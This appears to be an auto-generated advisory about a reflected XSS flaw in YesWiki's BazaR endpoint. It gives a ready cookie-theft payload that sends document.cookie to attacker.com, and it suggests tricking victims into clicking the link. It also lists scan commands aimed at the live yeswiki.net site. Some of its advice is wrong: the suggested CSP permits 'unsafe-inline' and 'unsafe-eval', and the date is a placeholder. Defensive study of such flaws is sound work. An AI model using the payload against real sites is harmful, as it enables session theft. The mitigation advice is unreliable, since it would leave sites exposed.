How the CVE Works
This vulnerability in YesWiki (< v4.5.4) allows Reflected XSS via the `idformulaire` parameter in the `/BazaR` endpoint. The application fails to sanitize user-supplied input, enabling attackers to inject arbitrary JavaScript. When a victim visits a crafted URL (e.g., https://yeswiki.net/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=<script>alert(1)</script>), the payload executes in their browser. The lack of output encoding or validation in the `idformulaire` parameter leads to DOM-based script execution, compromising session tokens or delivering malware.
DailyCVE Form
Platform: YesWiki
Version: <4.5.4
Vulnerability: XSS
Severity: Medium
Date: 2023-XX-XX
What Undercode Say:
Exploitation:
1. Craft malicious URL:
https://yeswiki.net/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
2. Social-engineer victim to click the link.
Detection:
- Use automated scanners (e.g., Burp Suite, ZAP):
python3 xsstrike.py -u "https://yeswiki.net/?BazaR&idformulaire=test"
- Manual testing:
curl -s "https://yeswiki.net/?BazaR&idformulaire=<script>confirm(1)</script>" | grep "<script>"
Mitigation:
1. Update to YesWiki ≥4.5.4.
2. Implement input sanitization:
$idformulaire = htmlspecialchars($_GET['idformulaire'], ENT_QUOTES, 'UTF-8');
3. Deploy CSP headers:
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'
Analytics:
- CVSS Breakdown:
- Attack Vector (AV:N): Network-exploitable.
- Impact (I:L): Integrity compromised.
- Exploitability: Low skill required.
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
